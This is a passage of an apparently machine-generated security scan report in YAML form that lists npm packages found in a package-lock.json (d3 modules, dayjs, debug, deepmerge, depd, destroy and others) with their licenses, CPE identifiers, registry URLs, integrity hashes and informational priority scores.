references: []
tags:
- sbom
- package
raw:
id: 63d3c4d24d9be1d5
name: d3-path
version: 3.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:d3-path:d3-path:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-path:d3_path:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_path:d3-path:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_path:d3_path:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3-path:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3_path:3.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/d3-path@3.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/d3-path/-/d3-path-3.1.0.tgz
integrity: sha512-p3KP5HCf/bvjBSSKuXid6Zqijx7wIfNW+J/maPs+iwR35at5JCbLUT0LzF1cnjbCHWhqzQTIN2Jpe8pRebIEFQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 964951e667c4c379
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: d3-scale 4.0.2'
title: d3-scale 4.0.2
description: 'Package discovered: d3-scale 4.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6f08c8eb1953f0ad
name: d3-scale
version: 4.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:d3-scale:d3-scale:4.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-scale:d3_scale:4.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_scale:d3-scale:4.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_scale:d3_scale:4.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3-scale:4.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3_scale:4.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/d3-scale@4.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/d3-scale/-/d3-scale-4.0.2.tgz
integrity: sha512-GZW464g1SH7ag3Y7hXjf8RoUuAFIqklOAq3MRl4OaWabTFJY9PN/E1YklhXLh+OQ3fM9yS2nOkCoS+WLZ6kvxQ==
dependencies:
d3-array: 2.10.0 - 3
d3-format: 1 - 3
d3-interpolate: 1.2.0 - 3
d3-time: 2.1.1 - 3
d3-time-format: 2 - 4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fdbd8e26e660bbf2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: d3-shape 3.2.0'
title: d3-shape 3.2.0
description: 'Package discovered: d3-shape 3.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 62919ef646dbae92
name: d3-shape
version: 3.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:d3-shape:d3-shape:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-shape:d3_shape:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_shape:d3-shape:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_shape:d3_shape:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3-shape:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3_shape:3.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/d3-shape@3.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/d3-shape/-/d3-shape-3.2.0.tgz
integrity: sha512-SaLBuwGm3MOViRq2ABk3eLoxwZELpH6zhl3FbAoJ7Vm1gofKx6El1Ib5z23NUEhF9AsGl7y+dzLe5Cw2AArGTA==
dependencies:
d3-path: ^3.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 53764226f7fa140f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: d3-time 3.1.0'
title: d3-time 3.1.0
description: 'Package discovered: d3-time 3.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 809edf0f6cbf0d31
name: d3-time
version: 3.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:d3-time:d3-time:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-time:d3_time:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_time:d3-time:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_time:d3_time:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3-time:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3_time:3.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/d3-time@3.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/d3-time/-/d3-time-3.1.0.tgz
integrity: sha512-VqKjzBLejbSMT4IgbmVgDjpkYrNWUYJnbCGo874u7MMKIWsILRX+OpX/gTk8MqjpT1A/c6HY2dCA77ZN0lkQ2Q==
dependencies:
d3-array: 2 - 3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e86c38bd447bf3a0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: d3-time-format 4.1.0'
title: d3-time-format 4.1.0
description: 'Package discovered: d3-time-format 4.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4c75f293b12c6086
name: d3-time-format
version: 4.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:d3-time-format:d3-time-format:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-time-format:d3_time_format:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_time_format:d3-time-format:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_time_format:d3_time_format:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-time:d3-time-format:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-time:d3_time_format:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_time:d3-time-format:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_time:d3_time_format:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3-time-format:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3_time_format:4.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/d3-time-format@4.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/d3-time-format/-/d3-time-format-4.1.0.tgz
integrity: sha512-dJxPBlzC7NugB2PDLwo9Q8JiTR3M3e4/XANkreKSUxF8vvXKqm1Yfq4Q5dl8budlunRVlUUaDUgFt7eA8D6NLg==
dependencies:
d3-time: 1 - 3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 014411da08f2c5cc
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: d3-timer 3.0.1'
title: d3-timer 3.0.1
description: 'Package discovered: d3-timer 3.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1f58b04c062182d6
name: d3-timer
version: 3.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:d3-timer:d3-timer:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-timer:d3_timer:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_timer:d3-timer:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_timer:d3_timer:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3-timer:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3_timer:3.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/d3-timer@3.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/d3-timer/-/d3-timer-3.0.1.tgz
integrity: sha512-ndfJ/JxxMd3nw31uyKoY2naivF+r29V+Lc0svZxe1JvvIRmi8hUsrMvdOwgS1o6uBHmiz91geQ0ylPP0aj1VUA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8491d2589d2b26fe
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: dayjs 1.11.20'
title: dayjs 1.11.20
description: 'Package discovered: dayjs 1.11.20'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 11ebb955a4940d8a
name: dayjs
version: 1.11.20
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:dayjs:dayjs:1.11.20:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/dayjs@1.11.20
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/dayjs/-/dayjs-1.11.20.tgz
integrity: sha512-YbwwqR/uYpeoP4pu043q+LTDLFBLApUP6VxRihdfNTqu4ubqMlGDLd6ErXhEgsyvY0K6nCs7nggYumAN+9uEuQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3e4836eb16baaf2c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: debug 2.6.9'
title: debug 2.6.9
description: 'Package discovered: debug 2.6.9'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 791d0c8d38a3b042
name: debug
version: 2.6.9
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:debug_project:debug:2.6.9:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/debug@2.6.9
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/debug/-/debug-2.6.9.tgz
integrity: sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==
dependencies:
ms: 2.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c3870af17f8e7246
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: debug 4.4.3'
title: debug 4.4.3
description: 'Package discovered: debug 4.4.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 96b0606cb5228062
name: debug
version: 4.4.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:debug_project:debug:4.4.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/debug@4.4.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/debug/-/debug-4.4.3.tgz
integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==
dependencies:
ms: ^2.1.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6cb9876ddd023a8b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: decamelize 1.2.0'
title: decamelize 1.2.0
description: 'Package discovered: decamelize 1.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 56044f762e36d59b
name: decamelize
version: 1.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:decamelize:decamelize:1.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/decamelize@1.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/decamelize/-/decamelize-1.2.0.tgz
integrity: sha512-z2S+W9X73hAUUki+N+9Za2lBlun89zigOyGrsax+KUQ6wKW4ZoWpEYBkGhQjwAjjDCkWxhY0VKEhk8wzY7F5cA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2d9026954da43a27
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: decimal.js-light 2.5.1'
title: decimal.js-light 2.5.1
description: 'Package discovered: decimal.js-light 2.5.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6135efdaaf1822bb
name: decimal.js-light
version: 2.5.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:decimal.js-light:decimal.js-light:2.5.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:decimal.js-light:decimal.js_light:2.5.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:decimal.js_light:decimal.js-light:2.5.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:decimal.js_light:decimal.js_light:2.5.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:decimal.js:decimal.js-light:2.5.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:decimal.js:decimal.js_light:2.5.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/decimal.js-light@2.5.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/decimal.js-light/-/decimal.js-light-2.5.1.tgz
integrity: sha512-qIMFpTMZmny+MMIitAB6D7iVPEorVw6YQRWkvarTkT4tBeSLLiHzcwj6q0MmYSFCiVpiqPJTJEYIrpcPzVEIvg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8e421fc3fe27aa9c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: deepmerge 4.3.1'
title: deepmerge 4.3.1
description: 'Package discovered: deepmerge 4.3.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6fcde9d497e83e33
name: deepmerge
version: 4.3.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:deepmerge:deepmerge:4.3.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/deepmerge@4.3.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz
integrity: sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: bd6d6c864c2f97b9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: delayed-stream 1.0.0'
title: delayed-stream 1.0.0
description: 'Package discovered: delayed-stream 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c23340a58ec36159
name: delayed-stream
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:delayed-stream:delayed-stream:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:delayed-stream:delayed_stream:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:delayed_stream:delayed-stream:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:delayed_stream:delayed_stream:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:delayed:delayed-stream:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:delayed:delayed_stream:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/delayed-stream@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz
integrity: sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b4af690e8812705b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: denque 2.1.0'
title: denque 2.1.0
description: 'Package discovered: denque 2.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b292c74570fb7df3
name: denque
version: 2.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:denque:denque:2.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/denque@2.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/denque/-/denque-2.1.0.tgz
integrity: sha512-HVQE3AAb/pxF8fQAoiqpvg9i3evqug3hoiwakOyZAwJm+6vZehbkYXZ0l4JxS+I3QxM97v5aaRNhj8v5oBhekw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 86dec3bfd9bed666
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: depd 2.0.0'
title: depd 2.0.0
description: 'Package discovered: depd 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 82a407fce3facea3
name: depd
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:depd:depd:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/depd@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/depd/-/depd-2.0.0.tgz
integrity: sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a7d6bc7c01ff6fdb
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: destroy 1.2.0'
title: destroy 1.2.0
description: 'Package discovered: destroy 1.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 916ee50fe6c61deb
name: destroy
version: 1.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:destroy:destroy:1.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/destroy@1.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz
integrity: sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b1baa34830820f96
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: detect-libc 2.1.2'
title: detect-libc 2.1.2
description: 'Package discovered: detect-libc 2.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: cd3c75639d40cfa6
name: detect-libc
version: 2.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
